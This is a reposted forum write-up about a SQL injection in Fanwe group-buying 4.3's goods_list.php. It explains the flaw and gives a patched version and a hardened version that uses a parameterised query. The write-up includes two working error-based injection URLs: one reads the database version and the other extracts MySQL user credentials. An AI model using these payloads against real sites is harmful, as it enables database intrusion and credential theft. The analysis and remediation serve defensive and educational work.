Fanwe group-buying (方维团购) 4.3, latest version: SQL injection vulnerability

mysql | 11 years ago (2015) | posted by admin

I had not been on the forum for a long time; today I saw a published exploit tool for the SQL injection in the latest Fanwe group-buying 4.3.
Well, based on the poster's information, plus having analysed Fanwe before, I quickly located it in
`\app\source\goods_list.php`

```php
if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")
```
If m=Goods, a=showcate, and the id value passed in is non-empty:
```php
$catepid = $_REQUEST['id'];
// reads the received parameter id
```
The value is then placed into the SQL statement unchanged:
```php
select pid from " . DB_PREFIX . "goods_cate where id=".$catepid
```

1. Determine the MySQL version

```text
index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
```

2. Obtain the MySQL account and password

```text
index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
```

Fix

```php
if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")
{
    //$catepid = $_REQUEST['id']; // original: reads the received parameter unchecked
    $catepid = intval($_REQUEST['id']); // force the value to an integer
    foreach($sidegoodscatelist as $k => $v){ // walk the category list
        if($v['id']==$catepid)
        {
            $is_top_cate=1;
        }
    }
}
```
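As an added example (not Fanwe's own code), the handler below shows the same branch hardened two ways: strict validation of `id` instead of a bare `intval()`, and a parameterised query so user input never becomes part of the SQL text. The mysqli connection `$db`, the helper names `parse_cate_id` and `get_cate_pid`, and the `fw_` table prefix are assumptions for illustration.

```php
<?php
// Added example, not the project's code. Assumed: $db is a connected mysqli
// object and DB_PREFIX is "fw_" (both placeholders for this illustration).
define('DB_PREFIX', 'fw_');

/**
 * Strict validation: accept only a plain positive decimal integer.
 * intval("103 and (select ...)") silently yields 103, which neutralises the
 * injection but hides tampering; rejecting the value instead makes such
 * requests visible in application logs as 400 responses.
 */
function parse_cate_id(?string $raw): ?int
{
    if ($raw === null || !preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        return null; // not a plain positive integer: refuse it
    }
    return (int) $raw;
}

/**
 * Look up the parent id of a category. Even though $cateId is already an
 * integer, bind it as a parameter so the query text contains no user input.
 */
function get_cate_pid(mysqli $db, int $cateId): ?int
{
    $sql  = 'SELECT pid FROM ' . DB_PREFIX . 'goods_cate WHERE id = ?';
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        return null; // prepare failed (schema or connection problem)
    }
    $stmt->bind_param('i', $cateId);
    $stmt->execute();
    $stmt->bind_result($pid);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? (int) $pid : null;
}

// Request handling, mirroring the original branch conditions.
if (($_REQUEST['m'] ?? '') === 'Goods'
    && ($_REQUEST['a'] ?? '') === 'showcate'
    && isset($_REQUEST['id']) && $_REQUEST['id'] !== '') {

    $catepid = parse_cate_id((string) $_REQUEST['id']);
    if ($catepid === null) {
        http_response_code(400);
        exit('invalid category id');
    }
    $pid = get_cate_pid($db, $catepid); // $db is the assumed mysqli connection
}
```

The original patch's `intval()` is enough to close this particular hole, because the column is numeric and the cast discards everything after the leading digits. Keeping the string-concatenated query around is still a risk, though: the next developer who copies the pattern for a string column gets no protection from the cast. Binding the value as a parameter removes that dependency on remembering to sanitise at every call site.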

Reposted from: http://www.2cto.com/Article/201407/316502.html
